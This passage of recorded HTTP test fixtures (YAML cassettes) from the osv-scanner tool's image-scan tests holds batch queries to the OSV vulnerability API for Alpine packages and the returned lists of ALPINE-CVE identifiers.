"version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.12-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/add_extractors url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 364 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "364" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out#01 url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_with_presets url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/image/testdata/cassettes/TestCommand_ExplicitExtractors_WithoutDefaults.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 146 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.12-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_ExplicitExtractors_WithoutDefaults/add_extractors url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 241 body: | { "results": [ { "vulns": [ { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "241" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/image/testdata/cassettes/TestCommand_HtmlFile.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.18", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_HtmlFile url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 9123 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-30139", "modified": "2025-12-03T22:50:14.655691Z" }, { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2021-28831", "modified": "2025-12-03T22:48:35.192485Z" }, { "id": "ALPINE-CVE-2021-42374", "modified": "2025-12-03T22:49:03.048460Z" }, { "id": "ALPINE-CVE-2021-42375", "modified": "2025-12-03T22:49:02.368046Z" }, { "id": "ALPINE-CVE-2021-42378", "modified": "2025-12-03T22:49:02.812229Z" }, { "id": "ALPINE-CVE-2021-42379", "modified": "2025-12-03T22:49:03.820223Z" }, { "id": "ALPINE-CVE-2021-42380", "modified": "2025-12-03T22:49:02.273108Z" }, { "id": "ALPINE-CVE-2021-42381", "modified": "2025-12-03T22:49:03.051591Z" }, { "id": "ALPINE-CVE-2021-42382", "modified": "2025-12-03T22:49:04.080847Z" }, { "id": "ALPINE-CVE-2021-42383", "modified": "2025-12-03T22:44:20.740566Z" }, { "id": "ALPINE-CVE-2021-42384", "modified": "2025-12-03T22:49:04.436301Z" }, { "id": "ALPINE-CVE-2021-42385", "modified": "2025-12-03T22:49:10.217079Z" }, { "id": "ALPINE-CVE-2021-42386", "modified": "2025-12-03T22:49:10.486445Z" }, { "id": "ALPINE-CVE-2022-28391", "modified": "2025-12-03T22:49:51.276555Z" }, { "id": "ALPINE-CVE-2022-30065", "modified": "2025-12-03T22:50:17.721153Z" }, { "id": "ALPINE-CVE-2022-48174", "modified": "2025-12-03T22:51:16.750993Z" }, { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-3711", "modified": "2025-12-03T22:48:47.560805Z" }, { "id": "ALPINE-CVE-2021-3712", "modified": "2025-12-03T22:48:49.466816Z" }, { "id": "ALPINE-CVE-2021-4044", "modified": "2025-12-03T22:48:53.587104Z" }, { "id": "ALPINE-CVE-2022-0778", "modified": "2025-12-03T22:51:07.769542Z" }, { "id": "ALPINE-CVE-2022-1343", "modified": "2025-12-03T22:49:45.912660Z" }, { "id": "ALPINE-CVE-2022-1434", "modified": "2025-12-03T22:49:45.753526Z" }, { "id": "ALPINE-CVE-2022-1473", "modified": "2025-12-03T22:49:45.860197Z" }, { "id": "ALPINE-CVE-2022-2097", "modified": "2025-12-03T22:49:52.265196Z" }, { "id": "ALPINE-CVE-2022-3358", "modified": "2025-12-03T22:50:26.362856Z" }, { "id": "ALPINE-CVE-2022-3602", "modified": "2025-12-03T22:49:29.680146Z" }, { "id": "ALPINE-CVE-2022-3786", "modified": "2025-12-03T22:49:30.746181Z" }, { "id": "ALPINE-CVE-2022-3996", "modified": "2025-12-03T22:49:49.550771Z" }, { "id": "ALPINE-CVE-2022-4203", "modified": "2025-12-03T22:50:09.259826Z" }, { "id": "ALPINE-CVE-2022-4304", "modified": "2025-12-03T22:50:48.258567Z" }, { "id": "ALPINE-CVE-2022-4450", "modified": "2025-12-03T22:50:58.174496Z" }, { "id": "ALPINE-CVE-2023-0215", "modified": "2025-12-03T22:51:20.776116Z" }, { "id": "ALPINE-CVE-2023-0216", "modified": "2025-12-03T22:51:17.381381Z" }, { "id": "ALPINE-CVE-2023-0217", "modified": "2025-12-03T22:51:22.400597Z" }, { "id": "ALPINE-CVE-2023-0286", "modified": "2025-12-03T22:51:24.172927Z" }, { "id": "ALPINE-CVE-2023-0401", "modified": "2025-12-03T22:51:23.275814Z" }, { "id": "ALPINE-CVE-2023-0464", "modified": "2025-12-03T22:51:31.741129Z" }, { "id": "ALPINE-CVE-2023-0465", "modified": "2025-12-03T22:51:25.194508Z" }, { "id": "ALPINE-CVE-2023-1255", "modified": "2025-12-03T22:51:44.316240Z" }, { "id": "ALPINE-CVE-2023-2650", "modified": "2025-12-03T22:52:10.812098Z" }, { "id": "ALPINE-CVE-2023-2975", "modified": "2025-12-03T22:52:35.084843Z" }, { "id": "ALPINE-CVE-2023-3446", "modified": "2025-12-03T22:52:52.082224Z" }, { "id": "ALPINE-CVE-2023-3817", "modified": "2025-12-03T22:52:53.211969Z" }, { "id": "ALPINE-CVE-2023-5363", "modified": "2025-12-03T22:54:35.065257Z" }, { "id": "ALPINE-CVE-2023-5678", "modified": "2025-12-03T22:54:30.066451Z" }, { "id": "ALPINE-CVE-2023-6129", "modified": "2025-12-03T22:54:41.708177Z" }, { "id": "ALPINE-CVE-2023-6237", "modified": "2025-12-03T22:54:40.422752Z" }, { "id": "ALPINE-CVE-2024-0727", "modified": "2025-12-03T22:54:44.266485Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2021-3711", "modified": "2025-12-03T22:48:47.560805Z" }, { "id": "ALPINE-CVE-2021-3712", "modified": "2025-12-03T22:48:49.466816Z" }, { "id": "ALPINE-CVE-2021-4044", "modified": "2025-12-03T22:48:53.587104Z" }, { "id": "ALPINE-CVE-2022-0778", "modified": "2025-12-03T22:51:07.769542Z" }, { "id": "ALPINE-CVE-2022-1343", "modified": "2025-12-03T22:49:45.912660Z" }, { "id": "ALPINE-CVE-2022-1434", "modified": "2025-12-03T22:49:45.753526Z" }, { "id": "ALPINE-CVE-2022-1473", "modified": "2025-12-03T22:49:45.860197Z" }, { "id": "ALPINE-CVE-2022-2097", "modified": "2025-12-03T22:49:52.265196Z" }, { "id": "ALPINE-CVE-2022-3358", "modified": "2025-12-03T22:50:26.362856Z" }, { "id": "ALPINE-CVE-2022-3602", "modified": "2025-12-03T22:49:29.680146Z" }, { "id": "ALPINE-CVE-2022-3786", "modified": "2025-12-03T22:49:30.746181Z" }, { "id": "ALPINE-CVE-2022-3996", "modified": "2025-12-03T22:49:49.550771Z" }, { "id": "ALPINE-CVE-2022-4203", "modified": "2025-12-03T22:50:09.259826Z" }, { "id": "ALPINE-CVE-2022-4304", "modified": "2025-12-03T22:50:48.258567Z" }, { "id": "ALPINE-CVE-2022-4450", "modified": "2025-12-03T22:50:58.174496Z" }, { "id": "ALPINE-CVE-2023-0215", "modified": "2025-12-03T22:51:20.776116Z" }, { "id": "ALPINE-CVE-2023-0216", "modified": "2025-12-03T22:51:17.381381Z" }, { "id": "ALPINE-CVE-2023-0217", "modified": "2025-12-03T22:51:22.400597Z" }, { "id": "ALPINE-CVE-2023-0286", "modified": "2025-12-03T22:51:24.172927Z" }, { "id": "ALPINE-CVE-2023-0401", "modified": "2025-12-03T22:51:23.275814Z" }, { "id": "ALPINE-CVE-2023-0464", "modified": "2025-12-03T22:51:31.741129Z" }, { "id": "ALPINE-CVE-2023-0465", "modified": "2025-12-03T22:51:25.194508Z" }, { "id": "ALPINE-CVE-2023-1255", "modified": "2025-12-03T22:51:44.316240Z" }, { "id": "ALPINE-CVE-2023-2650", "modified": "2025-12-03T22:52:10.812098Z" }, { "id": "ALPINE-CVE-2023-2975", "modified": "2025-12-03T22:52:35.084843Z" }, { "id": "ALPINE-CVE-2023-3446", "modified": "2025-12-03T22:52:52.082224Z" }, { "id": "ALPINE-CVE-2023-3817", "modified": "2025-12-03T22:52:53.211969Z" }, { "id": "ALPINE-CVE-2023-5363", "modified": "2025-12-03T22:54:35.065257Z" }, { "id": "ALPINE-CVE-2023-5678", "modified": "2025-12-03T22:54:30.066451Z" }, { "id": "ALPINE-CVE-2023-6129", "modified": "2025-12-03T22:54:41.708177Z" }, { "id": "ALPINE-CVE-2023-6237", "modified": "2025-12-03T22:54:40.422752Z" }, { "id": "ALPINE-CVE-2024-0727", "modified": "2025-12-03T22:54:44.266485Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2019-14697", "modified": "2025-12-03T22:44:35.333781Z" }, { "id": "ALPINE-CVE-2020-28928", "modified": "2025-12-03T22:47:06.985001Z" }, { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2019-14697", "modified": "2025-12-03T22:44:35.333781Z" }, { "id": "ALPINE-CVE-2020-28928", "modified": "2025-12-03T22:47:06.985001Z" }, { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-28831", "modified": "2025-12-03T22:48:35.192485Z" }, { "id": "ALPINE-CVE-2021-42374", "modified": "2025-12-03T22:49:03.048460Z" }, { "id": "ALPINE-CVE-2021-42375", "modified": "2025-12-03T22:49:02.368046Z" }, { "id": "ALPINE-CVE-2021-42378", "modified": "2025-12-03T22:49:02.812229Z" }, { "id": "ALPINE-CVE-2021-42379", "modified": "2025-12-03T22:49:03.820223Z" }, { "id": "ALPINE-CVE-2021-42380", "modified": "2025-12-03T22:49:02.273108Z" }, { "id": "ALPINE-CVE-2021-42381", "modified": "2025-12-03T22:49:03.051591Z" }, { "id": "ALPINE-CVE-2021-42382", "modified": "2025-12-03T22:49:04.080847Z" }, { "id": "ALPINE-CVE-2021-42383", "modified": "2025-12-03T22:44:20.740566Z" }, { "id": "ALPINE-CVE-2021-42384", "modified": "2025-12-03T22:49:04.436301Z" }, { "id": "ALPINE-CVE-2021-42385", "modified": "2025-12-03T22:49:10.217079Z" }, { "id": "ALPINE-CVE-2021-42386", "modified": "2025-12-03T22:49:10.486445Z" }, { "id": "ALPINE-CVE-2022-28391", "modified": "2025-12-03T22:49:51.276555Z" }, { "id": "ALPINE-CVE-2022-30065", "modified": "2025-12-03T22:50:17.721153Z" }, { "id": "ALPINE-CVE-2022-48174", "modified": "2025-12-03T22:51:16.750993Z" }, { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" } ] } ] } headers: Content-Length: - "9123" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/image/testdata/cassettes/TestCommand_OCIImage.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.18", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.18", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Alpine_3.10_image_tar_with_3.18_version_file url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 9123 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-30139", "modified": "2025-12-03T22:50:14.655691Z" }, { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2021-28831", "modified": "2025-12-03T22:48:35.192485Z" }, { "id": "ALPINE-CVE-2021-42374", "modified": "2025-12-03T22:49:03.048460Z" }, { "id": "ALPINE-CVE-2021-42375", "modified": "2025-12-03T22:49:02.368046Z" }, { "id": "ALPINE-CVE-2021-42378", "modified": "2025-12-03T22:49:02.812229Z" }, { "id": "ALPINE-CVE-2021-42379", "modified": "2025-12-03T22:49:03.820223Z" }, { "id": "ALPINE-CVE-2021-42380", "modified": "2025-12-03T22:49:02.273108Z" }, { "id": "ALPINE-CVE-2021-42381", "modified": "2025-12-03T22:49:03.051591Z" }, { "id": "ALPINE-CVE-2021-42382", "modified": "2025-12-03T22:49:04.080847Z" }, { "id": "ALPINE-CVE-2021-42383", "modified": "2025-12-03T22:44:20.740566Z" }, { "id": "ALPINE-CVE-2021-42384", "modified": "2025-12-03T22:49:04.436301Z" }, { "id": "ALPINE-CVE-2021-42385", "modified": "2025-12-03T22:49:10.217079Z" }, { "id": "ALPINE-CVE-2021-42386", "modified": "2025-12-03T22:49:10.486445Z" }, { "id": "ALPINE-CVE-2022-28391", "modified": "2025-12-03T22:49:51.276555Z" }, { "id": "ALPINE-CVE-2022-30065", "modified": "2025-12-03T22:50:17.721153Z" }, { "id": "ALPINE-CVE-2022-48174", "modified": "2025-12-03T22:51:16.750993Z" }, { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-3711", "modified": "2025-12-03T22:48:47.560805Z" }, { "id": "ALPINE-CVE-2021-3712", "modified": "2025-12-03T22:48:49.466816Z" }, { "id": "ALPINE-CVE-2021-4044", "modified": "2025-12-03T22:48:53.587104Z" }, { "id": "ALPINE-CVE-2022-0778", "modified": "2025-12-03T22:51:07.769542Z" }, { "id": "ALPINE-CVE-2022-1343", "modified": "2025-12-03T22:49:45.912660Z" }, { "id": "ALPINE-CVE-2022-1434", "modified": "2025-12-03T22:49:45.753526Z" }, { "id": "ALPINE-CVE-2022-1473", "modified": "2025-12-03T22:49:45.860197Z" }, { "id": "ALPINE-CVE-2022-2097", "modified": "2025-12-03T22:49:52.265196Z" }, { "id": "ALPINE-CVE-2022-3358", "modified": "2025-12-03T22:50:26.362856Z" }, { "id": "ALPINE-CVE-2022-3602", "modified": "2025-12-03T22:49:29.680146Z" }, { "id": "ALPINE-CVE-2022-3786", "modified": "2025-12-03T22:49:30.746181Z" }, { "id": "ALPINE-CVE-2022-3996", "modified": "2025-12-03T22:49:49.550771Z" }, { "id": "ALPINE-CVE-2022-4203", "modified": "2025-12-03T22:50:09.259826Z" }, { "id": "ALPINE-CVE-2022-4304", "modified": "2025-12-03T22:50:48.258567Z" }, { "id": "ALPINE-CVE-2022-4450", "modified": "2025-12-03T22:50:58.174496Z" }, { "id": "ALPINE-CVE-2023-0215", "modified": "2025-12-03T22:51:20.776116Z" }, { "id": "ALPINE-CVE-2023-0216", "modified": "2025-12-03T22:51:17.381381Z" }, { "id": "ALPINE-CVE-2023-0217", "modified": "2025-12-03T22:51:22.400597Z" }, { "id": "ALPINE-CVE-2023-0286", "modified": "2025-12-03T22:51:24.172927Z" }, { "id": "ALPINE-CVE-2023-0401", "modified": "2025-12-03T22:51:23.275814Z" }, { "id": "ALPINE-CVE-2023-0464", "modified": "2025-12-03T22:51:31.741129Z" }, { "id": "ALPINE-CVE-2023-0465", "modified": "2025-12-03T22:51:25.194508Z" }, { "id": "ALPINE-CVE-2023-1255", "modified": "2025-12-03T22:51:44.316240Z" }, { "id": "ALPINE-CVE-2023-2650", "modified": "2025-12-03T22:52:10.812098Z" }, { "id": "ALPINE-CVE-2023-2975", "modified": "2025-12-03T22:52:35.084843Z" }, { "id": "ALPINE-CVE-2023-3446", "modified": "2025-12-03T22:52:52.082224Z" }, { "id": "ALPINE-CVE-2023-3817", "modified": "2025-12-03T22:52:53.211969Z" }, { "id": "ALPINE-CVE-2023-5363", "modified": "2025-12-03T22:54:35.065257Z" }, { "id": "ALPINE-CVE-2023-5678", "modified": "2025-12-03T22:54:30.066451Z" }, { "id": "ALPINE-CVE-2023-6129", "modified": "2025-12-03T22:54:41.708177Z" }, { "id": "ALPINE-CVE-2023-6237", "modified": "2025-12-03T22:54:40.422752Z" }, { "id": "ALPINE-CVE-2024-0727", "modified": "2025-12-03T22:54:44.266485Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", 